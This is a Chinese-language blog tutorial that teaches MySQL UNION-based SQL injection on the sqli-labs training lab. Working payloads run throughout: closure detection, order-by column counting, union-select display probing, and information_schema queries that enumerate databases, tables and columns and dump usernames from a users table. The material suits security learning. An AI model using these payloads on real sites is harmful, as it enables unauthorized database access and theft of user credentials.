sql注入mysql的union联合注入

关于闭合符号怎么判断

可以使用来探测闭合,报错信息中后的符号即为闭合符号

用sqli第一关举例我们可以看到后是’,所以可以判断本关的闭合是’

union联合注入

(union注入条件:union用于合并多个select语句的结果,所有他呀求内部的select语句要拥有相同数量的列,列也要是相似的数据类型)

id=1’如果报错,那么就存在注入点,可以在使用id=1' and 1=1#id=1' and 1=2#判断,如果注入存在,那么id=1' and 1=2#会报错(有闭合说明是字符型,数字型就没得闭合了,并且输入数据错误,比如id=1-,如果后面没有闭合符,sql会自动矫正)

id=1' and 1=1--+执行

 

id=1' and 1=2--+报错

 

判断存在注入后,开始判断有多少表,使用order by判断(也可以使用group by,方法是一样的)

使用id=1' order by 10--+,他告诉我们没有那么多,我们可以试试折半去找

 

使用id=1' order by 5--+

也没有5个那么多,那我们试试3,使用id=1' order by 3--+

 

显示出来了,为了避免漏下,我们试试4,结果报错了,说明只有三个表

 

判断完有几个表,那我们就要看看这个字段的显示位置在哪了,我们可以给id一个不存在的值,比如-1a9999999

这里采用union注入 id=-1'union select 1,2,3--+,1,2,3为刚才探测到的字段 ,可以看到字段二在login name后,字段3在password后

 

然后就可以查看他都有什么数据库了id=-1'union select 1,2,group_concat(schema_name) from information_schema.schemata--+

 

翻译一下group_concat(schema_name) from information_schema.schemata--+

group_concat():是将查询到的结果合并,结果和结果之间用逗号隔开 。

information_schema:是mysql自带的一个信息数据库包含了mysql维护的其他数据库的信息

schemata:是information_schema库下的一个表,存放了当前数据库下的所有数据库,效果等同于showdatabase

schema_name:schemata表中的列,包含了当前数据库管理系统中所有的数据库名

直译过来大概就是打印information_schema库中schemata表schema_name列

information_schema数据库只存在于MySQL5.0之后,5.0之前只能使用access字典暴力破解的方式

在information_schema数据库中还可以利用的表:

schema_name     储存了所有数据库的库名
table_schema      储存了数据库名
tables             储存了数据库库名,以及该库中包含的表名,
table_schema        储存了数据库名
table_name       储存了表名

具体可参考:博客     官方文档

我们还可以在这查询数据库的一些信息,比如查询我们当前的数据库以及版本信息id=-1' union select 1,database(),version()--+,我们可以看到当前的数据库是security,mysql版本为5.7.26

 

version():查看数据库版本

database():查看使用的数据库

user():查看当前用户

limit:limit子句分批来获取所有数据

group_concat():一次性获取所有的数据库信息

我们知道了数据库,然后开始查看表名id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 

翻译一下id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+,大部分语句在前面已经翻译过,从information_schema数据库中的tables表中执行database()

然后我们要获取表中的所有的字段,这边选择获取users表中的字段,因为users表中存储的是用户数据id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users') --+

 

最后,获取字段中的所有数据id=0' union select 1,2,(select group_concat(username) from security.users) --+

 

原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/88529.html

(0)
guozi's avatarguozi
上一篇 2024年6月3日 下午5:48
下一篇 2024年6月3日 下午5:50

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注